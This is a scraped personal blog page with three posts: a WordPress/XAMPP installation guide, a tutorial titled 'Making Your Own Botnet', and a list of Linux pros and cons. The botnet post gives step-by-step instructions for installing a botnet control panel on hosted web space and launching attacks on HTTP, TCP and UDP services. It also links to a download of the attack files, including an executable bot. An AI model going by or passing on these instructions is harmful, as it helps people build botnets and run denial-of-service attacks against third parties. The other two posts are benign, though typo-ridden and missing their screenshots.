Showing posts with label keep it short but focused. Show all posts
Showing posts with label keep it short but focused. Show all posts

Friday, 27 June 2014

INSTALL WORDPRESS BY VIKAS BATTA

     How to install wordpress
Requirement: In order to install the wordpress use must have the following requirement.
    1.    Wordpress setup.
    2.    Xamp server/wamp server.

Note: In order to install the wordpress and Xamp setup downloard the setup from the given links below: http://www.wordpress.org , https://www.apachefriends.org/download.html

   After the installation of the follow the followiunging steps
   1.    Downloard the setup of wordpress from the above  site show as below and extract the file.
     



   2.    Downloard the XAMPP server.


   3.    Now place the wordpress file in XAMP/htdocs
    
            
   4.    Now run the XAMP by typing localhost/wordpress on browser and click on create configuration file.



   5.    After clicking the following window appear click on lets go.

   6.    After that enter the information required as below.

   7.    Now go to Localhost/xammp. And click the phpmy admin.

   8.    After clicking it will take you to the php myadmin. Enter the database name.


   9.    Now fill the following information and click submit.

  10.            After submitting following page will appear and press run.

  11.            After running enter the information and click on install wordpress.


  12.             After that it will take you to the login page which as given        below.


  13.              Entering the username and password it will take you to the wordpress page.

  14.                       Add the plugins to the wordpress in the option provided.


This is how the wordpress is being installed.












Making Your Own Botnet By Vikas Batta

A botnet is a group of computers connected in a coordinated fashion for malicious purposes. Each computer in a botnet is called a bot. These bots form a network of compromised computers, which is controlled by a third party and used to transmit malware or spam, or to launch attacks.

A botnet may also be known as a zombie army.
Originally, botnets were created as a tool with valid purposes in Internet relay chat (IRC) channels. Eventually, hackers exploited the vulnerabilities in IRC networks and developed bots to perform malicious activities such as password theft, keystroke logging, etc.

An attacker will often target computers not safeguarded with firewalls and/or anti-virus software. A botnet manipulator can get control of a computer in a variety of ways, but most frequently does so via viruses or worms. Botnets are significant because they have become tools that both hackers and organized crime use to perform illegal activities online. For example, hackers use botnets to launch coordinated denial-of-service attacks, while organized crime uses botnets as ways to spam, or send a phishing attack that is then used for identify theft. 

Even more concerning is the industry that has sprung up around botnets in which bot herders build botnets specifically to "rent" to the highest bidder. Whether they send spam, adware/spyware, viruses/worms, etc., botnets can be used to perpetrate just about any type of digital attack.

Step 1  :-
              Open the C-panel  of your hosting





Step 2  :-
                Now open the MySQL to create a database

 
Step 3  :-
               After createing the database now open the the PHP MY ADMIN and IMPORT the SQL file.





Step 4  :-
             Now open the FILE MANAGER


Step 5  :-
             Here Upload the file in the PUBLIC.HTML directory
             file's are
           
                              and upload in public.html directory


Step 6  :-
             Now insatll your bot online
             like www.example.com.install/install.php



Step 7  :-
            After the insatllation of bot now Open it with your USER NAME or PASSWORD


Step 8  :-
             After the login you entered in your bot


Step 9  :-
             Now open the REd tube.exe and put the url of your site


Step 10  :-
               Now you can attck  on HTTP site, TCP and UDP services



You can Downlaod all related file from here

https://www.sendspace.com/file/otrwqv

THANKS

Saturday, 31 August 2013



Properties of Linux


Linux Pros:
A lot of the advantages of Linux are a consequence of Linux' origins, deeply rooted in UNIX, except for the first advantage, of course:

  • Linux is free: If you want to spend absolutely nothing, you don't even have to pay the price of a CD. Linux can be downloaded in its entirety from the Internet completely for free. No registration fees, no costs per user, free updates, and freely available source code in case you want to change the behavior of your system.

  • Linux is portable: Linux is portable to any hardware platform: A vendor who wants to sell a new type of computer and who doesn't know what kind of OS his new machine will run can take a Linux kernel and make it work on his hardware, because documentation related to this activity is freely available.

  • Linux was made to keep on running: As with UNIX, a Linux system expects to run without rebooting all the time. That is why a lot of tasks are being executed at night or scheduled automatically for other calm moments, resulting in higher availability during busier periods and a more balanced use of the hardware.

  • Linux is secure and versatile: The security model used in Linux is based on the UNIX idea of security, which is known to be robust and of proven quality. But Linux is not only fit for use as a fort against enemy attacks from the Internet: it will adapt equally to other situations, utilizing the same high standards for security

  • Linux is scalable: From a Palmtop with 2 MB of memory to a petabyte storage cluster with hundreds of nodes: add or remove the appropriate packages and Linux fits all.

·         The Linux OS and most Linux applications have very short debug-times: Because Linux has been developed and tested by thousands of people; both errors and people to fix them are usually found rather quickly. It sometimes happens that there are only a couple of hours between discovery and fixing of a bug.



Linux Cons:

  • Linux is not very user friendly and confusing for beginners: It must be said that Linux, at least the core system, is less user friendly to use than MS Windows and certainly more difficult than Mac OS.

  • Is an Open Source product trustworthy? How can something that is free also be reliable? Linux users have the choice whether to use Linux or not, which gives them an enormous advantage compared to users of proprietary software, who don't have that kind of freedom. After long periods of testing, most Linux users come to the conclusion that Linux is not only as good, but in many cases better and faster that the traditional solutions